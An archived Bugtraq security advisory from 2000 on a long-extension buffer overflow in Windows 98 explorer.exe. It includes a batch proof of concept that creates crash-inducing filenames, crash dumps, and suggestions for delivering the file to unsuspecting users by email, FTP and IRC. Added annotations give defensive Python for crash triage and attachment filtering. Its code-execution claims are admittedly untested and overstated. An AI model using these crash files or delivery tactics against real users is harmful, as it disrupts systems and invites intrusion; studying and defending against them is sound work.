[14618] in bugtraq


Securax Security Advisory: Windows98 contains a serious buffer

daemon@ATHENA.MIT.EDU (Zoa_Chien)
Sat Apr 22 02:54:15 2000

Message-Id:  <4.2.0.58.20000421191649.00a1a940@urc1.cc.kuleuven.ac.be>
Date:         Fri, 21 Apr 2000 19:16:59 +0200
Reply-To: Zoa_Chien <zoa_chien@INAME.COM>
From: Zoa_Chien <zoa_chien@INAME.COM>
To: BUGTRAQ@SECURITYFOCUS.COM


=====================================================================
Securax-SA-02                                       Security Advisory
belgian.networking.security                                     Dutch
=====================================================================
Topic:          Ms Windows '95?/'98/SE explorer.exe causes a buffer
                overflow with long filename extensions.

Announced:      2000-04-21
Affects:        Ms Windows '95?, Ms Windows '98, Ms Windows '98 SE,
                Windows Millennium?
None affected:  Ms Windows NT Server/Workstation 4.0, Ms win2K
=====================================================================


         THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR
  RESULTS.  THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS
  100% CORRECT.  THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR
  NOTICE.

         PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING
  THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUGTRAQ.
  THANK YOU.

I.   Background

I don't know what causes explorer to crash.
I suspect it to be a buffer overflow in explorer.exe, but in some cases
I noticed other programs (that do not use explorer.exe) crash
too.
I don't have the time right now to start debugging; maybe I'll do so
next week. (If I find something useful, I'll post an update.)

II.  Problem Description

 When the Microsoft Windows explorer tries to parse a
 filename that contains more than 129 characters in the extension, a
 buffer will overflow.

And you will get this error:

EXPLORER caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:

Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161

 As you can see, EIP was overwritten during this overflow,
 which means we can execute code from the filename.

 We can use 247 + 129 + 118 bytes to store data for some shell
 code.

 If you add some extra special characters to the filename, you can cause
 it to be recognized as write-only in Windows (and not found in DOS).
 That way, you will not be able to remove it unless you write
 directly to the FAT.
 This would make viruses invincible to AV tools.
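As an added example (mine, not part of the Securax advisory), the Python below parses the two Windows 9x fault dialogs quoted in this post and reports which 32-bit registers hold a run of printable ASCII. That is the triage step behind the observation that EIP was overwritten: 0x61616161 is four 'a' bytes from the extension. Run on the Eudora dialog further down, it finds no such register, so that dump on its own shows a read fault at a code address inside EUDORA.EXE rather than direct control of EIP. The dump strings are copied from the advisory; the function names are mine.

```python
import re

# Crash dialogs as printed in the advisory (Windows 9x "invalid page fault" box).
EXPLORER_DUMP = """EXPLORER caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246
EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161
ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047
EDX=81724974 ES=018f EDI=7fcbd320 GS=0000
Bytes at CS:EIP:

Stack dump:
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161 61616161 61616161 61616161 61616161 61616161
61616161 61616161
"""

EUDORA_DUMP = """EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:
"""

# Only 8-hex-digit values: the 16-bit segment registers (CS, SS, FS, ...) are
# skipped on purpose, since two bytes are too short to judge as "attacker data".
REG_RE = re.compile(r"\b([A-Z]+)=([0-9a-fA-F]{8})\b")


def parse_registers(dump):
    """Return {name: value} for the 32-bit registers in the Registers: section."""
    section = dump.split("Registers:", 1)[1].split("Bytes at CS:EIP:", 1)[0]
    return {name: int(val, 16) for name, val in REG_RE.findall(section)}


def parse_stack(dump):
    """Return the Stack dump: words as integers (empty if the box printed none)."""
    section = dump.split("Stack dump:", 1)[1]
    return [int(w, 16) for w in re.findall(r"\b[0-9a-fA-F]{8}\b", section)]


def as_printable(value):
    """Decode a 32-bit value as four little-endian bytes and return the text if
    every byte is printable ASCII; otherwise None."""
    raw = value.to_bytes(4, "little")
    if all(0x20 <= b <= 0x7E for b in raw):
        return raw.decode("ascii")
    return None


def triage(dump):
    """Map each register whose value is a printable ASCII run to that text,
    e.g. EIP=61616161 -> 'aaaa' for the explorer.exe dialog."""
    hits = {}
    for reg, val in parse_registers(dump).items():
        txt = as_printable(val)
        if txt is not None:
            hits[reg] = txt
    return hits


def controlled_eip(dump):
    """True when EIP itself is a printable run, i.e. the fault address came
    straight from input bytes."""
    return "EIP" in triage(dump)


if __name__ == "__main__":
    for name, dump in (("explorer", EXPLORER_DUMP), ("eudora", EUDORA_DUMP)):
        print(name, triage(dump), "stack words:", len(parse_stack(dump)),
              "EIP from input:", controlled_eip(dump))
```

For the explorer dialog the result is EAX, EBP and EIP all decoding to "aaaa", and every one of the 16 stack words is the same value; for the Eudora dialog nothing decodes, which is why the advisory can only say that Eudora crashed, not that its EIP was overwritten.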

III.  Reproduction of the problem

a) creating such a file:

  place the following code in a .bat file:

---- cut here

rem Note: "=A0" and "=90" below are quoted-printable escapes left by the mail
rem encoding; in the original file they are the single raw bytes 0xA0 and 0x90.

echo This will create a file that when clicked upon in windows
echo explorer or any other program that calls explorer.exe for
echo file management will cause a buffer overflow.

dir *.* > _=A0.=A0------Buffer overflow-----------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

echo This will cause a Blue screen of death
echo Just to show you it is possible to execute remote code.
echo (all it does is overwrite the return address with a false one.)

dir *.* > _=A0.=A0------Blue-screen-of-death------aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa12345678=90AAAAAAAAAA

--- cut here

   now run the .bat file


b) using this bug on remote computers:


    Tested on Eudora Pro:
 You could attach the file to an e-mail and send this e-mail to
 an unsuspecting computer user. When he checks his e-mail and the
 mail program attempts to save the attachment to disk, the
 program will crash due to a buffer overflow.

EUDORA caused an invalid page fault in
module EUDORA.EXE at 0187:00428b05.
Registers:
EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206
EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764
ECX=006a305c DS=018f ESI=007f07a8 FS=582f
EDX=007eff8c ES=018f EDI=8173b024 GS=0000
Bytes at CS:EIP:
56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00
Stack dump:

 Funny note: every time you try to access the dir where the
 attachment should have been saved, your program will crash,
 even if this program is not using explorer for its file
 management. (In this case you don't even have to click on the
 file or move over it and wait some time; it will crash
 immediately, rendering the entire directory useless.)

 This is what I got in Windows Commander while trying to browse the
 directory. Note: the file doesn't show up in a listing; nevertheless,
 Windows Commander crashes with:

Application Error
Exception EAccessViolation in module WINCMD32.EXE at 7F8B0736
Access violation at address 7FCB1946. Read of address 00580939

 Scanning this dir with scandisk does not report any problems.

c) uploading a file with this name to an FTP server, or placing it
 on some HTTP server available for download.

d) DCC sends on IRC.

e) many more?

IV.  Impact

 This type of attack will allow any user, local or remote, with
 file creation access to run hostile code on the computer.
 (Since e-mail programs will attempt to write to disk, almost
 any Windows 98 user with an e-mail address is vulnerable.)

 If someone writes some tiny code that will download and execute
 a remote trojan, this could cause a huge problem!
 This could be used to gain root access to all Windows computers.
 Just imagine what harm someone could cause if he sends out an
 e-mail to 10,000 persons containing code to DDoS some server.

 Writing such code might be tricky, because we are dealing with a
 filename, and not all hex codes are accepted as a legal filename.
 (This could be partially circumvented by creating the filename
 with a raw write to disk.)

 Please note that due to my exams, I don't have the time to write
 the shell code... Everything stated about the execution of code
 is purely hypothetical.

V.   Solution

 None yet.
 Just don't download extremely long filenames.
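The two places where this bites a defender are section b) (a mail client writing an attachment to disk) and the one-line solution above ("don't download extremely long filenames"). As an added example of my own, not from the advisory or Securax, here is a Python filter a mail gateway or download handler could apply to attachment names before they reach a Windows 9x disk. It flags the two properties the advisory describes: an extension longer than 129 characters (the figure from the advisory) and control or non-ASCII characters such as the 0xA0 byte in the batch file above, which are what make the file hard to list or delete afterwards. The policy limits EXT_POLICY_LEN and NAME_MAX_LEN, the function names and the sample names are my assumptions.

```python
import re

# From the advisory: an extension longer than 129 characters crashed explorer.exe.
EXT_CRASH_LEN = 129
# Policy limits assumed for this example (not from the advisory): no legitimate
# attachment needs an extension over 16 characters or a name over 255.
EXT_POLICY_LEN = 16
NAME_MAX_LEN = 255


def split_extension(name):
    """Windows takes the text after the last dot as the extension; a name with
    no dot has an empty extension."""
    base, dot, ext = name.rpartition(".")
    return (name, "") if not dot else (base, ext)


def filename_findings(name):
    """Reasons to quarantine an attachment name; an empty list means it passes."""
    findings = []
    _, ext = split_extension(name)
    if len(ext) > EXT_CRASH_LEN:
        findings.append(f"extension of {len(ext)} chars exceeds the "
                        f"{EXT_CRASH_LEN}-char crash threshold")
    elif len(ext) > EXT_POLICY_LEN:
        findings.append(f"extension of {len(ext)} chars exceeds policy "
                        f"limit of {EXT_POLICY_LEN}")
    # Control and non-ASCII characters (e.g. the 0xA0 byte the advisory's
    # batch file embeds) are what make the file hard to list or delete later.
    odd = [c for c in name if ord(c) < 0x20 or ord(c) > 0x7E]
    if odd:
        findings.append(f"{len(odd)} control/non-ASCII character(s), "
                        f"first is U+{ord(odd[0]):04X}")
    if len(name) > NAME_MAX_LEN:
        findings.append(f"name of {len(name)} chars exceeds {NAME_MAX_LEN}")
    return findings


def safe_name(name):
    """Rewrite a rejected name into one the shell can handle: ASCII letters,
    digits, '_', '-' and '.' only, extension capped, total length capped."""
    def clean(s):
        return re.sub(r"[^A-Za-z0-9_.-]", "", s)
    base, ext = split_extension(name)
    base = clean(base) or "attachment"
    ext = clean(ext)[:EXT_POLICY_LEN]
    out = f"{base}.{ext}" if ext else base
    return out[:NAME_MAX_LEN]


def filter_attachments(names):
    """Split names into (accepted, quarantined); quarantined maps each original
    name to (safe replacement name, list of findings)."""
    accepted, quarantined = [], {}
    for name in names:
        findings = filename_findings(name)
        if findings:
            quarantined[name] = (safe_name(name), findings)
        else:
            accepted.append(name)
    return accepted, quarantined


# Constructed sample attachment names (not real mail). The second mirrors the
# advisory's pattern: a 0xA0 byte on each side of the dot plus a long run of 'a'.
SAMPLE_NAMES = [
    "report.txt",
    "_\xa0.\xa0------Buffer overflow-----" + "a" * 140,
    "invoice." + "b" * 50,
]

if __name__ == "__main__":
    ok, bad = filter_attachments(SAMPLE_NAMES)
    print("accepted:", ok)
    for name, (replacement, why) in bad.items():
        print(f"quarantined {name[:40]!r}... -> {replacement!r}: {why}")
```

The crash threshold and the policy limit are kept separate on purpose: a 50-character extension is not dangerous on the page's evidence, but it is not something a user ever needs either, so a gateway can reject it on policy grounds while the 129-character check documents the known crash condition.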
=20
VI.  Credits

 Initial bug report : |ncubus -*- overflow detection + usage concepts
 + quickly written advisory by Zoa_Chien -*- Exploit shell-code : you?
 -*- Thnx to Lamagra for testing this on NT. -*- bug by Microsoft.


Final Notes: I discovered this while working on my soon to be released
tutorial: "Locally Hacking MS-Windows". If anyone has rare information
on this subject, feel free to mail me.
If anyone has a great job to offer, please mail; I'm sick and tired of
studying stupid things.. mmm.. that reminds me, I'd better start
studying for my exam tomorrow morning Ó+W|~+æ|þ+é CARRIER LOST :-)


Yours,

Zoa_Chien, aka da G#df@rter.			zoachien@securax.org

=====================================================================
For more information                             advisory@securax.org
Website                                        http://www.securax.org
Advisories/Text                           http://www.securax.org/pers
---------------------------------------------------------------------

